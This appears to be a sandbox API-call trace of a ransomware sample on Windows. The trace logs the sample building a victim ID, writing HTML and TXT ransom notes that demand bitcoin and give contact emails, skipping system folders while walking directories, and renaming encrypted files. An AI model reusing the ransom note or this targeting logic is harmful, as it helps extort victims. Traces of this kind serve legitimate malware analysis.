	[0174.319] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.319] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0174.320] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0174.320] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.321] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0174.321] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0174.321] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0174.321] CloseHandle (hObject=0x39c) returned 1
	[0174.322] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.322] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.322] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0174.322] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0174.324] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.326] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0174.326] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0174.329] CloseHandle (hObject=0x39c) returned 1
	[0174.331] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.331] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.332] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0174.333] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.333] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.333] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0174.333] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.334] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0174.334] CloseHandle (hObject=0x39c) returned 1
	[0174.334] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81705d4e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb95f0
	[0174.335] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*") returned 97
	[0174.335] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.335] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*") returned 0x61
	[0174.335] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.335] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0174.335] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.335] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0174.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0174.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0174.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0174.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0174.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0174.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.338] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0174.338] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.338] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0174.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.346] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0174.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.346] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.347] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0174.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.347] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0174.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.347] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0174.347] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.347] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0174.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.348] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0174.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.348] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0174.348] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0174.348] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0174.348] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81705d4e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0174.349] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0174.349] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81705d4e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81705d4e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81705d4e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0174.349] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816df278, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x816df278, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x816df278, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0174.349] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12d8e21, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12d8e21, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa12ff08c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71a, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0174.349] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13252fc, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13252fc, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13252fc, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0174.349] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13252fc, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13252fc, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13252fc, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0174.349] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 1
	[0174.349] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 0
	[0174.350] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81604bf8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81604bf8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81604bf8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0174.350] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81604bf8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81604bf8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81604bf8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0174.350] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0174.350] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0174.351] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0174.351] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0174.351] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0174.351] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", cAlternateFileName="{B0B91~1")) returned 1
	[0174.351] lstrcmpW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="..") returned 1
	[0174.351] lstrcmpW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2=".") returned 1
	[0174.352] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0174.352] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0174.352] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}"
	[0174.352] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}"
	[0174.352] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\"
	[0174.352] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\"
	[0174.352] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*"
	[0174.352] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0174.359] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*") returned 84
	[0174.359] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.359] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*") returned 0x54
	[0174.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.359] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="windows") returned 0x0
	[0174.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="boot") returned 0x0
	[0174.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="system volume information") returned 0x0
	[0174.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="temp") returned 0x0
	[0174.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="program files") returned 0x0
	[0174.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="appdata") returned 0x0
	[0174.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="application data") returned 0x0
	[0174.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="winnt") returned 0x0
	[0174.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="tmp") returned 0x0
	[0174.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*.*", lpSrch="cache") returned 0x0
	[0174.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
